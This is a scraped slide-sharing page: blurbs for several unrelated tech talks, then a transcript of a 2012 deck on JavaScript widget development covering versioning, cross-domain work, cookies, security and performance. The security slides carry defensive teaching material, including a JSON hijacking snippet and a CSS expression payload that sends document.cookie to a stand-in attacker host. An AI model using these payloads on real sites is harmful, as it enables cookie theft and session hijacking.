AI VIDEO MAGAZINE - June 2025 - r/aivideo1pcity Studios, Inc AI VIDEO MAGAZINE - r/aivideo community newsletter – Exclusive Tutorials: How to make an AI VIDEO from scratch, PLUS: How to make AI MUSIC, Hottest ai videos of 2025, Exclusive Interviews, New Tools, Previews, and MORE - JUNE 2025 ISSUE -
From Manual to Auto Searching- FME in the Driver's Seat
From Manual to Auto Searching- FME in the Driver's SeatSafe Software Finding a specific car online can be a time-consuming task, especially when checking multiple dealer websites. A few years ago, I faced this exact problem while searching for a particular vehicle in New Zealand. The local classified platform, Trade Me (similar to eBay), wasn’t yielding any results, so I expanded my search to second-hand dealer sites—only to realise that periodically checking each one was going to be tedious. That’s when I noticed something interesting: many of these websites used the same platform to manage their inventories. Recognising this, I reverse-engineered the platform’s structure and built an FME workspace that automated the search process for me. By integrating API calls and setting up periodic checks, I received real-time email alerts when matching cars were listed. In this presentation, I’ll walk through how I used FME to save hours of manual searching by creating a custom car-finding automation system. While FME can’t buy a car for you—yet—it can certainly help you find the one you’re after!
Raman Bhaumik - Passionate Tech Enthusiast
Raman Bhaumik - Passionate Tech EnthusiastRaman Bhaumik A Junior Software Developer with a flair for innovation, Raman Bhaumik excels in delivering scalable web solutions. With three years of experience and a solid foundation in Java, Python, JavaScript, and SQL, she has streamlined task tracking by 20% and improved application stability.
Smarter Aviation Data Management: Lessons from Swedavia Airports and Sweco
Smarter Aviation Data Management: Lessons from Swedavia Airports and SwecoSafe Software Managing airport and airspace data is no small task, especially when you’re expected to deliver it in AIXM format without spending a fortune on specialized tools. But what if there was a smarter, more affordable way?
Join us for a behind-the-scenes look at how Sweco partnered with Swedavia, the Swedish airport operator, to solve this challenge using FME and Esri.
Learn how they built automated workflows to manage periodic updates, merge airspace data, and support data extracts – all while meeting strict government reporting requirements to the Civil Aviation Administration of Sweden.
Even better? Swedavia built custom services and applications that use the FME Flow REST API to trigger jobs and retrieve results – streamlining tasks like securing the quality of new surveyor data, creating permdelta and baseline representations in the AIS schema, and generating AIXM extracts from their AIS data.
To conclude, FME expert Dean Hintz will walk through a GeoBorders reading workflow and highlight recent enhancements to FME’s AIXM (Aeronautical Information Exchange Model) processing and interpretation capabilities.
Discover how airports like Swedavia are harnessing the power of FME to simplify aviation data management, and how you can too.
WebdriverIO & JavaScript: The Perfect Duo for Web Automation
WebdriverIO & JavaScript: The Perfect Duo for Web Automationdigitaljignect In today’s dynamic digital landscape, ensuring the quality and dependability of web applications is essential. While Selenium has been a longstanding solution for automating browser tasks, the integration of WebdriverIO (WDIO) with Selenium and JavaScript marks a significant advancement in automation testing. WDIO enhances the testing process by offering a robust interface that improves test creation, execution, and management. This amalgamation capitalizes on the strengths of both tools, leveraging Selenium’s broad browser support and WDIO’s modern, efficient approach to test automation. As automation testing becomes increasingly vital for faster development cycles and superior software releases, WDIO emerges as a versatile framework, particularly potent when paired with JavaScript, making it a preferred choice for contemporary testing teams.
"Database isolation: how we deal with hundreds of direct connections to the d...
"Database isolation: how we deal with hundreds of direct connections to the d...Fwdays What can go wrong if you allow each service to access the database directly? In a startup, this seems like a quick and easy solution, but as the system scales, problems appear that no one could have guessed.
In my talk, I'll share Solidgate's experience in transforming its architecture: from the chaos of direct connections to a service-based data access model. I will talk about the transition stages, bottlenecks, and how isolation affected infrastructure support. I will honestly show what worked and what didn't. In short, we will analyze the controversy of this talk.
The Future of Product Management in AI ERA.pdf
The Future of Product Management in AI ERA.pdfAlyona Owens Hi, I’m Aly Owens, I have a special pleasure to stand here as over a decade ago I graduated from CityU as an international student with an MBA program. I enjoyed the diversity of the school, ability to work and study, the network that came with being here, and of course the price tag for students here has always been more affordable than most around.
Since then I have worked for major corporations like T-Mobile and Microsoft and many more, and I have founded a startup. I've also been teaching product management to ensure my students save time and money to get to the same level as me faster avoiding popular mistakes. Today as I’ve transitioned to teaching and focusing on the startup, I hear everybody being concerned about Ai stealing their jobs… We’ll talk about it shortly.
But before that, I want to take you back to 1997. One of my favorite movies is “Fifth Element”. It wowed me with futuristic predictions when I was a kid and I’m impressed by the number of these predictions that have already come true. Self-driving cars, video calls and smart TV, personalized ads and identity scanning. Sci-fi movies and books gave us many ideas and some are being implemented as we speak. But we often get ahead of ourselves:
Flying cars,Colonized planets, Human-like AI: not yet, Time travel, Mind-machine neural interfaces for everyone: Only in experimental stages (e.g. Neuralink).
Cyberpunk dystopias: Some vibes (neon signs + inequality + surveillance), but not total dystopia (thankfully).
On the bright side, we predict that the working hours should drop as Ai becomes our helper and there shouldn’t be a need to work 8 hours/day. Nobody knows for sure but we can require that from legislation. Instead of waiting to see what the government and billionaires come up with, I say we should design our own future.
So, we as humans, when we don’t know something - fear takes over. The same thing happened during the industrial revolution. In the Industrial Era, machines didn’t steal jobs—they transformed them but people were scared about their jobs. The AI era is making similar changes except it feels like robots will take the center stage instead of a human. First off, even when it comes to the hottest space in the military - drones, Ai does a fraction of work. AI algorithms enable real-time decision-making, obstacle avoidance, and mission optimization making drones far more autonomous and capable than traditional remote-controlled aircraft. Key technologies include computer vision for object detection, GPS-enhanced navigation, and neural networks for learning and adaptation. But guess what? There are only 2 companies right now that utilize Ai in drones to make autonomous decisions - Skydio and DJI.
"Scaling in space and time with Temporal", Andriy Lupa.pdf
"Scaling in space and time with Temporal", Andriy Lupa.pdfFwdays Design patterns like Event Sourcing and Event Streaming have long become standards for building real-time analytics systems. However, when the system load becomes nonlinear with fast and often unpredictable spikes, it's crucial to respond quickly in order not to lose real-time operating itself.
In this talk, I’ll share my experience implementing and using a tool like Temporal.io. We'll explore the evolution of our system for maintaining real-time report generation and discuss how we use Temporal both for short-lived pipelines and long-running background tasks.
UserCon Belgium: Honey, VMware increased my bill
UserCon Belgium: Honey, VMware increased my billstijn40 VMware’s pricing changes have forced organizations to rethink their datacenter cost management strategies. While FinOps is commonly associated with cloud environments, the FinOps Foundation has recently expanded its framework to include Scopes—and Datacenter is now officially part of the equation. In this session, we’ll map the FinOps Framework to a VMware-based datacenter, focusing on cost visibility, optimization, and automation. You’ll learn how to track costs more effectively, rightsize workloads, optimize licensing, and drive efficiency—all without migrating to the cloud. We’ll also explore how to align IT teams, finance, and leadership around cost-aware decision-making for on-prem environments. If your VMware bill keeps increasing and you need a new approach to cost management, this session is for you!
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
Coordinated Disclosure for ML - What's Different and What's the Same.pdfPriyanka Aash Coordinated Disclosure for ML - What's Different and What's the Same
Techniques for Automatic Device Identification and Network Assignment.pdf
Techniques for Automatic Device Identification and Network Assignment.pdfPriyanka Aash Techniques for Automatic Device Identification and Network Assignment
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdfPriyanka Aash GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now
Ad
Java scriptwidgetdevelopmentjstanbul2012
- 1. JavaScript Widget Development Best Practices Volkan Özçelik [email protected] 2012-07-29 @ jstanbul http://jstabul.org/2012
- 2. Who am I? • CTO, cember.net (%100 acquired by Xing AG; RIP) • Project Director, livego.com (gone to deadpool, RIP) • CO-VP of Technology, grou.ps ( http://grou.ps/ ) • JavaScript Engineer, SocialWire ( http://socialwire.com/ ) • J4V45cR1p7 h4x0R, o2.js, ( http://o2js.com/ )
- 3. Other Places to Find Me • http://github.com/v0lkan • http://geekli.st/volkan • http://twitter.com/linkibol • http://linkd.in/v0lkan
- 4. Outline • What is a Widget? / Types of Widgets • Challenges Involved • Versioning • You are not the host, you are the thief. • Shared Environment • Bumping the Cross-Domain Wall • Not Your Grandma’s Cookies • Security • Performance • Questions
- 5. tar -zxvf 30Min.gz http://bit.ly/js-widget (work in progress)
- 6. What is a Widget? • A Distributed Plugin • Source Site ( widget provider ) • Consumer Sites ( publishers ) • Can have a GUI ( weather forecast ) • May not have GUI too ( analytics, statistics ) • Can be Stateful • Can be Stateless
- 7. Versioning Hassle • Types of Versioning • URL Versioning • Version Number as an Init Parameter • If it ain’t broke, they won’t fix it. • When’s the last time you updated that Wordpress theme? • Nobody will change that darn version number!
- 8. Versioning Hassle • google‘s ga.js 2 hour cache time; • Facebook‘s all.js 15 minute cache time; • twitter‘s widgets.js 30 minute cache time. What part of “Far Future Expires Header” don’t you understand?!
- 9. Versioning Hassle • Far Future Expires Header • Self Cache-Revalidating Scripts • A Bootloader Script • A JavaScript Beacon • Iframe Refresh • window.location.reload(true)
- 11. Act, but don’t be Seen • You don’t own publisher’s DOM. • Leave minimal trace behind. • Do not slow down publisher. • Do not pollute global namespace.
- 12. Act, but don’t be Seen • Do not extend Object.prototype or Function.prototype • Show love to the Module Pattern, • Do not slow down publisher • Async initialization, • Lazy Load. • Do not slow down yourself • Native is faster, • Use IDs everywhere.
- 13. Environment is Shared • Prefix everything. • I mean… everything!
- 15. Cross Domain Boundary • Modern Methods • CORS • HTML5 window.postMessage API • Hacks • Flash Proxy • Hash Fragment Transport • window.name Transport • Iframe inside an Iframe (klein bottle) • Use Publisher’s Server as a Proxy • JSON with Padding
- 16. Third Party Cookies • Can be disabled by default. • Users may explicitly disable them. • Ad blocker browser plugins may disable them. • You cannot rely on their existence.
- 17. Third Party Cookies • Meaning of ‚disabled‛ varies too • Firefox & Opera • Server cannot read, client cannot write • We’re tossed! (or are we?) • IE • Server can read, client cannot write • Webkit (Chrome & Safari) • Server can read, • client can ‚kinda‛ write (iframe post hack)
- 18. Third Party Cookies • Check for 3rd Party Cookie Support First • Don’t jump straight into hacks. • External Windows as a Rescue • A pop-up is considered ‚first party‛ • What about Opera & Firefox ? • Store session ID as a variable. • Pass to the server at each request. • Do not store on publisher’s page! • Use an IFRAME on API domain for security.
- 19. Widget Security • Bottom Line Up Front • Sanitize everything. • First deny everything, then whitelist known good. • Check referrers, have a list of trusted domains. • Do not trust anyone. function Anyone(){} function Publisher(){} Publisher.prototype = new Anyone();
- 20. Widget Security • XSS • Sanitize everything • Escape < > ; , ‘ ‚ into HTML entities • CSRF • Use a CSRF token • Denial of Service • Subdomains per publisher ( publisher1.api.example.com ) • Throttle suspicious requests per subdomain. • Best handled on network / hardware layer. • Session Hijacking • … is a reality. • The only reasonable protection is HTTPS.
- 21. Widget Security (lesser known) JSON Hijacking <script> var captured = []; function Array() { for (var i = 0; i < 3; i++) { this[i] setter = function(val) { captured.push(val); }; } } </script> <script src="http://api.example.com/products.json"></script>
- 22. Widget Security (lesser known) CSS Expression Hijacking var _wd_borderColor = '#000;x:expression(var i = new Image; i.src="http://attacker.example.com/?" + document.cookie);';
- 23. Widget Security (lesser known) Clickjacking • Invisible IFRAME positioned on a UI element. Remedy: • Framekiller scripts • X-Frame-Options header • Request confirmation for sensitive actions • Register all your publishers
- 24. Widget Performance • Minimize Initial Payload • Tiny bootloader, then load dependencies • Lazy load when possible • Combine and Minify Assets • CSS Sprites • Defer images (use a default image, then load original) • Minimize # of HTTP Requests
- 25. Widget Performance • Minimize Repaint and Reflow • Rate-limit Server Requests (throttle, debounce) • Yield with setTimeout(fn, 0) • Chunk large arrays of instructions. • Improve Perceived Performance • Be an optimist: act, then verify.
- 26. Widget Performance • Do not micro-optimize, • Do not optimize prematurely, • Optimizing without measurement is misleading, • It’s hard to measure a third party widget’s performance. • A lot of moving parts involved. • Tools like jsperf will not be of much use. • Do not use your 8GB Ram + SSD MacBook for profiling. • Test on an low-grade machine. • Do not forget mobile!